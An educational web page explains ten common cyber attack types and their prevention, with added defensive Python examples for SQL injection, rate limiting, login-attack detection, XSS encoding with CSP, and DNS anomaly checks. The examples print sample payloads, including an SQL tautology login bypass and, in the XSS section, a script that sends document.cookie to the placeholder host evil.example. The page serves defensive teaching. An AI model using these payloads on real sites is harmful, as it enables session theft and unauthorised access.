Kernel of Truth

Common Attack Types

💥 Common Cyber Attack Types Explained

Cyber attackers use a wide range of techniques to infiltrate, disrupt, or exploit systems. Whether targeting individuals, companies, or governments, these attack types represent the most frequently seen threats in the modern threat landscape.

Understanding them is key to defending against them.


🪝 1. Phishing Attacks

What It Is:
A social engineering attack in which the attacker impersonates a trusted party (a colleague, a bank, an IT helpdesk) to trick users into clicking malicious links, opening attachments, or handing over credentials and other sensitive information.

Variants:

  • Email phishing
  • Spear phishing (targeted)
  • SMS phishing (smishing)
  • Voice phishing (vishing)

Prevention:

  • Email filtering and blocking of lookalike domains
  • Security awareness training, with an easy way for staff to report suspicious messages
  • Multi-factor authentication (MFA), ideally phishing-resistant (FIDO2/WebAuthn), since one-time codes can be relayed by real-time phishing proxies

🧬 2. Malware

What It Is:
Malicious software designed to disrupt, damage, or gain unauthorised access to a system.

Types of Malware:

  • Viruses
  • Worms
  • Trojans
  • Spyware
  • Ransomware
  • Rootkits

Prevention:

  • Keep systems patched
  • Use endpoint protection (EDR/AV)
  • Monitor file behaviour and registry changes

🔒 3. Ransomware

What It Is:
A type of malware that encrypts a victim's files, and increasingly also exfiltrates them first, then demands a ransom for the decryption key and for not publishing the stolen data.

Delivery Methods:

  • Phishing emails
  • Malicious downloads
  • Exploit kits

Prevention:

  • Offline, immutable and regularly tested backups
  • Block known C2 IPs and domains
  • Network segmentation and least-privilege accounts, so one infected host cannot encrypt everything it can reach

🎭 4. Man-in-the-Middle (MitM)

What It Is:
An attacker positions themselves between two parties and secretly relays, reads, or alters the traffic flowing between them, while each side believes it is talking directly to the other.

Common Forms:

  • ARP spoofing on a local network
  • Rogue Wi-Fi access points
  • HTTPS stripping (downgrading a connection to plain HTTP)
  • Session hijacking using intercepted cookies or tokens

Prevention:

  • Enforce TLS (HTTPS) and send HSTS headers so browsers refuse to downgrade to HTTP
  • Use VPNs on untrusted networks
  • Implement certificate pinning in mobile and other native clients (browsers no longer support HPKP)

🧩 5. SQL Injection (SQLi)

What It Is:
Untrusted input is concatenated into a SQL query so that it changes the query's structure rather than being treated as data, letting the attacker read or modify the database.

Impact:

  • Data exfiltration
  • User impersonation
  • Full database control

Prevention:

  • Use parameterised queries (prepared statements); allow-list anything that cannot be a parameter, such as table or column names
  • Run the application with a least-privilege database account
  • Use Web Application Firewalls (WAFs) as defence in depth, not as the primary control
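
The difference between a concatenated query and a parameterised one is easiest to see side by side. The example below is added here and is not code from the original page: it builds a constructed in-memory SQLite database, shows a login that a tautology payload bypasses, the parameterised version that the same payload cannot bypass, and an allow-list for the one thing placeholders cannot protect, a column name in ORDER BY.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite database with two users.
# Passwords are stored in clear text only to keep the injection demo short;
# a real system stores salted password hashes.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    # The query is built by string concatenation, so quotes in the input
    # change the SQL structure instead of being treated as data.
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    # Parameterised query: the SQL text is fixed and the driver binds the
    # values separately, so the input can never become SQL.
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Placeholders only work for values. Identifiers such as column names must be
# checked against an allow-list before they are spliced into the query text.
ALLOWED_SORT_COLUMNS = {"username", "role"}


def list_users_sorted(conn, sort_by):
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"invalid sort column: {sort_by!r}")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {sort_by}")
    return [row[0] for row in rows]


def demo():
    conn = build_db()
    # Classic tautology payload placed in the password field.
    payload = "' OR '1'='1"
    return {
        "vulnerable_bypass": login_vulnerable(conn, "alice", payload),
        "safe_bypass": login_safe(conn, "alice", payload),
        "safe_legit": login_safe(conn, "alice", "correct-horse"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the payload in the password field the concatenated query becomes `... AND password = '' OR '1'='1'`, which matches every row, so the vulnerable login returns the first user (here the admin). The parameterised version returns nothing for the same input and only succeeds with the real password.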

💣 6. Denial of Service (DoS) / Distributed DoS (DDoS)

What It Is:
Exhausting a system or service with traffic or requests until it is unavailable to legitimate users; in a DDoS the traffic comes from many sources at once, typically a botnet.

Types:

  • Volumetric attacks (UDP floods, ICMP floods, DNS/NTP amplification)
  • Protocol attacks (SYN floods, which exhaust connection state)
  • Application-layer attacks (HTTP floods, expensive search or login requests)

Prevention:

  • Rate limiting
  • CDN/DDoS protection (e.g. Cloudflare, Akamai)
  • Network firewalls and load balancers
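
Rate limiting is the one item in that list an application team can implement themselves. The token-bucket limiter below is an added example, not code from the original page: each client key (here an IP address) gets a bucket holding `capacity` tokens that refills at `rate` tokens per second, a request spends one token, and a client whose bucket is empty is rejected. The traffic fed to it is constructed: one source sending 100 requests in a second next to a normal client sending one per second.

```python
from collections import defaultdict


class TokenBucket:
    """Per-client bucket: `capacity` is the allowed burst, `rate` the sustained req/s."""

    def __init__(self, capacity, rate):
        self.capacity = capacity
        self.rate = rate
        self.tokens = float(capacity)
        self.last = None  # timestamp of the previous request

    def allow(self, now):
        if self.last is None:
            self.last = now
        elapsed = now - self.last
        self.last = now
        # Refill proportionally to elapsed time, never above capacity.
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


class RateLimiter:
    def __init__(self, capacity=10, rate=1.0):
        self.buckets = defaultdict(lambda: TokenBucket(capacity, rate))

    def check(self, client_key, now):
        return self.buckets[client_key].allow(now)


def simulate(requests, capacity=10, rate=1.0):
    """requests: iterable of (timestamp_seconds, client_key), in time order.

    Returns {client_key: (allowed, rejected)}.
    """
    limiter = RateLimiter(capacity, rate)
    stats = defaultdict(lambda: [0, 0])
    for ts, key in requests:
        if limiter.check(key, ts):
            stats[key][0] += 1
        else:
            stats[key][1] += 1
    return {key: tuple(v) for key, v in stats.items()}


def sample_traffic():
    # Constructed traffic: 203.0.113.9 fires 100 requests within one second
    # (an application-layer flood); 198.51.100.4 sends one request per second.
    flood = [(i / 100.0, "203.0.113.9") for i in range(100)]
    normal = [(float(i), "198.51.100.4") for i in range(5)]
    return sorted(flood + normal)


if __name__ == "__main__":
    for client, (ok, dropped) in simulate(sample_traffic()).items():
        print(f"{client}: allowed={ok} rejected={dropped}")
```

With a burst of 10 and a sustained rate of 1 request per second, the flooding source gets its first 10 requests through and the remaining 90 rejected, while the normal client is never throttled. A limiter like this only protects the application layer: a volumetric flood that saturates the upstream link never reaches it, which is why the CDN or scrubbing provider in the list above is still needed, and keying on IP alone will over-throttle users behind a shared NAT, so production limiters usually combine IP with session or token keys.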

🧠 7. Brute Force and Credential Stuffing

What It Is:
Brute force makes automated password guesses against one or a few accounts; credential stuffing replays username/password pairs leaked from other breaches against many accounts, relying on password reuse.

Tools Used:

  • Hydra, Burp Suite, SentryMBA

Prevention:

  • Use strong password policies and reject passwords found in breach lists
  • Throttle and lock out after failed attempts, but with progressive delays and per-IP limits so an attacker cannot lock legitimate users out at will; stuffing makes only one or two attempts per account, so per-account lockout alone will not catch it
  • Deploy CAPTCHA and MFA
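
Because the two attacks look different in the logs (many accounts from one source versus many failures on one account), they need different detection rules. The example below is added here and is not code from the original page: it parses a constructed authentication log in a simple format of my own (`ts ip login user=<u> result=<ok|fail>`, not any product's format) and flags one source that replays leaked pairs across many accounts alongside one account hammered from two addresses.

```python
import re
from collections import defaultdict


def sample_log_lines():
    # Constructed log lines in the made-up format parsed by LINE_RE below.
    lines = []
    # 203.0.113.7 replays leaked pairs against eight different accounts; one hits.
    stuffed = ["dave", "erin", "frank", "grace", "heidi", "ivan", "judy", "carol"]
    for i, user in enumerate(stuffed):
        result = "ok" if user == "carol" else "fail"
        lines.append(f"2024-05-01T10:00:{i:02d}Z 203.0.113.7 login user={user} result={result}")
    # Two addresses try twelve wrong passwords against a single account.
    for i in range(8):
        lines.append(f"2024-05-01T10:01:{i:02d}Z 198.51.100.4 login user=bob result=fail")
    for i in range(4):
        lines.append(f"2024-05-01T10:02:{i:02d}Z 198.51.100.5 login user=bob result=fail")
    # Normal traffic.
    lines.append("2024-05-01T10:03:00Z 192.0.2.10 login user=alice result=ok")
    lines.append("2024-05-01T10:04:00Z 192.0.2.10 login user=alice result=ok")
    return lines


LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) login user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:  # lines that do not match the expected format are skipped
            events.append(m.groupdict())
    return events


def classify(events, stuffing_min_users=5, stuffing_min_fail_ratio=0.8, brute_min_fails=10):
    """Return sorted findings as (kind, subject, breadth, failures) tuples.

    credential_stuffing: one IP, many distinct usernames, almost all failing
    brute_force:         one username, many failures, from one or more IPs
    """
    per_ip = defaultdict(lambda: {"users": set(), "fail": 0, "total": 0})
    per_user = defaultdict(lambda: {"ips": set(), "fail": 0})
    for e in events:
        ip_stats = per_ip[e["ip"]]
        ip_stats["users"].add(e["user"])
        ip_stats["total"] += 1
        if e["result"] == "fail":
            ip_stats["fail"] += 1
            per_user[e["user"]]["fail"] += 1
            per_user[e["user"]]["ips"].add(e["ip"])

    findings = []
    for ip, s in per_ip.items():
        ratio = s["fail"] / s["total"]
        if len(s["users"]) >= stuffing_min_users and ratio >= stuffing_min_fail_ratio:
            findings.append(("credential_stuffing", ip, len(s["users"]), s["fail"]))
    for user, s in per_user.items():
        if s["fail"] >= brute_min_fails:
            findings.append(("brute_force", user, len(s["ips"]), s["fail"]))
    return sorted(findings)


if __name__ == "__main__":
    for finding in classify(parse(sample_log_lines())):
        print(finding)
```

The stuffing rule deliberately ignores the absolute failure count: a single source touching eight accounts with seven failures is already suspicious even though no individual account would have tripped a lockout threshold. The brute-force rule keys on the username, so splitting the guesses across two source addresses does not help the attacker. In production the thresholds would be evaluated over a sliding time window rather than the whole log.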

🕵️‍♂️ 8. Insider Threats

What It Is:
Malicious or negligent actions by employees or contractors with access to systems.

Types:

  • Data theft
  • System sabotage
  • Unintentional leaks (e.g. via misconfigured sharing)

Prevention:

  • Role-based access controls (RBAC)
  • Data loss prevention (DLP)
  • Insider threat detection programs

🧱 9. Cross-Site Scripting (XSS)

What It Is:
Attacker-controlled script is injected into a web page (reflected from a request, stored in the application, or introduced through DOM manipulation) and executes in other users' browsers with the page's origin.

Impact:

  • Session hijacking
  • Credential theft
  • Defacing websites

Prevention:

  • Encode output for the context it is inserted into (HTML body, attribute, JavaScript, URL); escaping on input alone is not enough
  • Use Content Security Policy (CSP) to restrict where scripts may load from
  • Disable inline JavaScript where possible, or allow it only with CSP nonces
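
The following is an added example, not code from the original page, showing the first and third points together: a template that inserts a comment verbatim next to one that encodes it for the HTML body and attribute contexts, and a per-response CSP that permits only same-origin scripts plus inline scripts carrying that response's nonce. The `initComments()` call and the header layout are assumptions made for the example.

```python
import html
import secrets


def render_vulnerable(comment):
    # Inserts the user's comment verbatim: stored or reflected XSS.
    return f'<p class="comment">{comment}</p>'


def render_safe(comment):
    # HTML body context: encode <, >, &, " and ' so markup in the input is shown, not parsed.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_safe(value):
    # Attribute context: quotes must be encoded too, or the input can close the
    # attribute and add event handlers. html.escape(quote=True) covers this.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def new_nonce():
    # Fresh random nonce per response; must never be reused or predictable.
    return secrets.token_urlsafe(16)


def csp_header(nonce):
    # Only same-origin scripts and inline scripts tagged with this nonce may run.
    # object-src 'none' and base-uri 'none' close two common bypass routes.
    return (
        f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'none'"
    )


def page(comment):
    """Build (headers, body) for one response (assumed shape for the example)."""
    nonce = new_nonce()
    headers = {"Content-Security-Policy": csp_header(nonce)}
    body = f'<script nonce="{nonce}">initComments();</script>' + render_safe(comment)
    return headers, body


if __name__ == "__main__":
    payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(render_attr_safe('" onfocus="alert(1)" autofocus="'))
    hdrs, body = page(payload)
    print(hdrs["Content-Security-Policy"])
    print(body)
```

Even if an encoding bug let the payload through, the browser would refuse to run the injected `<script>` because it carries no valid nonce. `html.escape` is only correct for the HTML body and attribute contexts; data placed inside a JavaScript string or a URL needs the encoder for that context, and the safest option is to avoid those placements altogether.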

🌍 10. DNS Spoofing / Poisoning

What It Is:
Manipulating DNS responses to redirect traffic to malicious sites.

Impact:

  • Phishing
  • Malware delivery
  • Surveillance

Prevention:

  • Use DNSSEC so resolvers can verify that answers are signed by the zone owner; it only helps where the resolver validates
  • Enforce encrypted DNS (DoH or DoT) between clients and the resolver; this protects that hop, not the resolver's own lookups
  • Monitor DNS logs for anomalies such as unexpected answers for important names or bursts of NXDOMAIN from one client
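
Two of the anomalies worth monitoring for are an important name suddenly resolving to an address outside its known-good set (a poisoned or spoofed answer) and a client producing a burst of NXDOMAIN responses for random-looking names (a sign of a domain-generation algorithm or DNS tunnelling). The example below is added here and is not code from the original page: the log is constructed in a simple `ts client qname rcode answer` format of my own, not any resolver's output format, and the baseline of known-good addresses is an assumed value that in practice would come from the authoritative zone or a validating resolver.

```python
import re
from collections import defaultdict

# Constructed resolver log (made-up format, see LINE_RE).
SAMPLE_DNS_LOG = """\
2024-05-01T09:00:00Z 10.0.0.5 login.example.com NOERROR 198.51.100.20
2024-05-01T09:00:05Z 10.0.0.6 login.example.com NOERROR 198.51.100.21
2024-05-01T09:00:09Z 10.0.0.5 www.example.com NOERROR 198.51.100.30
2024-05-01T09:01:00Z 10.0.0.7 login.example.com NOERROR 203.0.113.66
2024-05-01T09:02:00Z 10.0.0.9 kq3x9v.example.net NXDOMAIN -
2024-05-01T09:02:01Z 10.0.0.9 a8fj2m.example.net NXDOMAIN -
2024-05-01T09:02:02Z 10.0.0.9 zz01pq.example.net NXDOMAIN -
2024-05-01T09:02:03Z 10.0.0.9 m4n5b6.example.net NXDOMAIN -
2024-05-01T09:02:04Z 10.0.0.9 r7t8y9.example.net NXDOMAIN -
2024-05-01T09:02:05Z 10.0.0.9 www.example.com NOERROR 198.51.100.30
"""

# Assumed known-good answers for the names that matter most.
BASELINE = {
    "login.example.com": {"198.51.100.20", "198.51.100.21"},
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<qname>\S+) "
    r"(?P<rcode>NOERROR|NXDOMAIN|SERVFAIL) (?P<answer>\S+)$"
)


def parse_dns_log(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # ignore lines that do not match the expected format
            events.append(m.groupdict())
    return events


def find_unexpected_answers(events, baseline):
    """Answers for baselined names that fall outside the known-good set."""
    return [
        (e["client"], e["qname"], e["answer"])
        for e in events
        if e["rcode"] == "NOERROR"
        and e["qname"] in baseline
        and e["answer"] not in baseline[e["qname"]]
    ]


def find_nxdomain_bursts(events, min_queries=5, min_ratio=0.8):
    """Clients whose queries are mostly NXDOMAIN, as (client, nx, total, distinct_nx_names)."""
    per_client = defaultdict(lambda: {"total": 0, "nx": 0, "nx_names": set()})
    for e in events:
        s = per_client[e["client"]]
        s["total"] += 1
        if e["rcode"] == "NXDOMAIN":
            s["nx"] += 1
            s["nx_names"].add(e["qname"])
    return sorted(
        (client, s["nx"], s["total"], len(s["nx_names"]))
        for client, s in per_client.items()
        if s["total"] >= min_queries and s["nx"] / s["total"] >= min_ratio
    )


if __name__ == "__main__":
    events = parse_dns_log(SAMPLE_DNS_LOG)
    print("unexpected answers:", find_unexpected_answers(events, BASELINE))
    print("NXDOMAIN bursts:", find_nxdomain_bursts(events))
```

The baseline check is deliberately narrow: it only inspects names you have chosen to watch, because legitimate services change addresses often enough that alerting on every change would drown the signal. The NXDOMAIN rule counts distinct names as well as the ratio so that one client repeatedly retrying a single typo is not mistaken for a DGA.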

🧠 Summary

Cyber threats are diverse, adaptive, and constantly evolving. By understanding these common attack types, defenders can better detect, prevent, and respond to incidents before damage is done.

🛡️ Cybersecurity is less about perfection and more about layered defence and constant vigilance.